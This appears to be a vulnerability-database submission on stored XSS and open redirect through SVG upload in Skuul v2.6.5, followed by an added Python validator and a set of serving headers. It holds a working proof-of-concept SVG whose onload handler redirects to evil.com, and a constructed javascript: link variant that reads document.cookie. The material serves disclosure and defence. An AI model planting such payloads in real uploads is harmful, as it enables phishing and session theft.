Submission #689012: yungifez Skuul v2.6.5 Open Redirect (Info)

Title: yungifez Skuul v2.6.5 Open Redirect

Description: Skuul version 2.6.5 allows unsanitized SVG files to be uploaded in the Edit School section. Because the application serves the uploaded SVG back as-is, without sanitization, a restrictive Content-Security-Policy or a download-forcing Content-Disposition, an attacker can embed JavaScript or a redirection payload in the file. When a user or administrator opens the uploaded image directly (for example via "Open Image in New Tab"), the browser loads the SVG as a top-level document and executes the embedded script, resulting in stored cross-site scripting (XSS) or an open redirect. Note that an SVG rendered through an <img> tag does not run script; the payload fires only when the file is opened directly, which is why step 4 below is required.

Steps to Reproduce:
1. Log in to Skuul at http://127.0.0.1:8000/login as Admin.
2. Navigate to: http://sk.htb:8000/dashboard/schools/1/edit
3. Upload an SVG file with the following content:

    <?xml version="1.0" standalone="yes"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="window.location='https://evil.com/'">
      <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
    </svg>

4. Any user (Super Admin, Student, Teacher or Parent) opens the image in a new tab.
5. The browser automatically redirects to https://evil.com/.

Impact:
-) Automatic redirection to attacker-controlled websites (phishing/malware risk).
-) Stored XSS through malicious SVG payloads.
-) Credential theft or session hijacking when the SVG is served from the application's own origin, since the script then runs with access to that origin's cookies and DOM.
-) High impact if an admin account is compromised, affecting all users.
-) Loss of user trust and potential reputational damage to the platform.

Recommendation:
-) Disallow SVG uploads entirely, or
-) Sanitize SVGs before storage using libraries such as DOMPurify, sanitize-svg or similar, stripping <script>, event-handler attributes such as onload, javascript: URLs, <foreignObject> and external references.
-) Serve uploaded SVGs with the Content-Type: image/svg+xml header plus X-Content-Type-Options: nosniff, and force download with Content-Disposition: attachment where possible. The correct content type on its own does not stop script from running when the file is opened directly, so also send a Content-Security-Policy such as "sandbox; script-src 'none'" on the upload route, or serve uploads from a separate origin.
-) Store and serve only rasterized versions (e.g., PNG/JPEG).

Affected Version: Skuul v2.6.5

Product Source:
-) Website: https://yungifez.github.io/skuul.org/
-) GitHub Repository: https://github.com/yungifez/skuul

Credits: Zeeshan Khan https://www.thezeeshankhan.site/
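The report's recommendations, as an added example that is not part of the submission or of Skuul's own code: a Python allow-list check that rejects the PoC SVG above (and two constructed variants) before storage, and the response headers under which an SVG that does get stored cannot run its onload payload when a user opens it in a new tab. The function names, the header set and the sample inputs other than the report's payload are this example's own assumptions.

```python
"""Added example (not Skuul's code): reject uploaded SVGs that can run script,
and build the response headers under which a stored SVG cannot execute its
onload payload when opened directly as a document.

REPORT_PAYLOAD is the SVG from the report; the other inputs are constructed.
"""
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

# Elements that can execute script, embed foreign content or fetch remote
# resources.  <a> and <use> are included because href on them is a
# javascript:/exfiltration vector; a school logo never needs them.
FORBIDDEN_TAGS = {
    "script", "foreignObject", "iframe", "embed", "object", "use", "image",
    "a", "set", "animate", "animateTransform", "handler", "listener",
}
URL_PREFIXES = ("javascript:", "data:", "http:", "https:", "//")


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def find_svg_problems(data: bytes) -> list[str]:
    """Return the reasons the upload must be rejected (empty list means OK)."""
    problems = []
    lowered = data.lower()
    # Refuse DTDs outright: they add entity-expansion/XXE risk and a logo never
    # needs one.  expat does not fetch the external DTD here, but we reject the
    # declaration before inspecting any content anyway.
    if b"<!doctype" in lowered or b"<!entity" in lowered:
        problems.append("DOCTYPE/ENTITY declaration present")
    if b"<?xml-stylesheet" in lowered:
        problems.append("xml-stylesheet processing instruction present")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        problems.append(f"not well-formed XML: {exc}")
        return problems
    if root.tag != f"{{{SVG_NS}}}svg":
        problems.append(f"root element is {root.tag!r}, not <svg> in the SVG namespace")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in FORBIDDEN_TAGS:
            problems.append(f"forbidden element <{tag}>")
        for attr, value in el.attrib.items():
            name = _local(attr)
            v = value.strip().lower()
            if name.lower().startswith("on"):
                # The vector from the report: onload= on the root <svg>.
                problems.append(f"event handler {name}= on <{tag}>")
            elif name == "href" and v.startswith(URL_PREFIXES):
                problems.append(f"{name}= with disallowed URL scheme on <{tag}>")
            elif name == "style" and ("url(" in v or "expression(" in v or "@import" in v):
                problems.append(f"style= with external reference on <{tag}>")
    return problems


def is_safe_svg(data: bytes) -> bool:
    return not find_svg_problems(data)


def svg_response_headers(filename: str) -> dict[str, str]:
    """Headers for serving a stored SVG.  image/svg+xml alone does not stop the
    browser from running the file's script when it is navigated to; the
    attachment disposition (ignored for <img> subresource loads, so logos still
    render in pages) and a CSP sandbox with no script-src are what neuter the
    onload payload.  Serving uploads from a separate origin is better still."""
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{filename}"',
        "Content-Security-Policy": "sandbox; default-src 'none'; script-src 'none'; style-src 'unsafe-inline'",
    }


# The SVG from the report, verbatim.
REPORT_PAYLOAD = b"""<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="window.location='https://evil.com/'">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>"""

# Constructed: the same triangle with the script vector removed.
CLEAN_LOGO = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
<polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>"""

# Constructed: a quieter variant using a javascript: link instead of onload.
LINK_PAYLOAD = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<a xlink:href="javascript:alert(document.cookie)"><text x="10" y="20">click me</text></a>
</svg>"""

if __name__ == "__main__":
    for label, blob in [("report payload", REPORT_PAYLOAD),
                        ("clean logo", CLEAN_LOGO),
                        ("javascript: link", LINK_PAYLOAD)]:
        print(f"{label}: {find_svg_problems(blob) or 'accepted'}")
    print(svg_response_headers("logo.svg"))
```

The check is deliberately an allow-list with a few hard rejections rather than an attempt to clean the file: an upload that trips any rule is refused, which is simpler to reason about than rewriting attacker-controlled XML. The headers are the second line of defence for files already on disk, and neither replaces the report's first recommendation of not accepting SVG at all.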
Source: https://gist.github.com/thezeekhan/7fc54fd44bc5f318be0350b367b2d8ff
User: Zeeshan Khan (UID 91384)
Submitted: 2025-11-04 05:57 PM (8 months ago)
Moderation: 2025-11-29 01:59 PM (25 days later)
Status: Accepted
VulDB entry: 333788 [yungifez Skuul School Management System up to 2.6.5 SVG File edit cross site scripting]
Points: 20
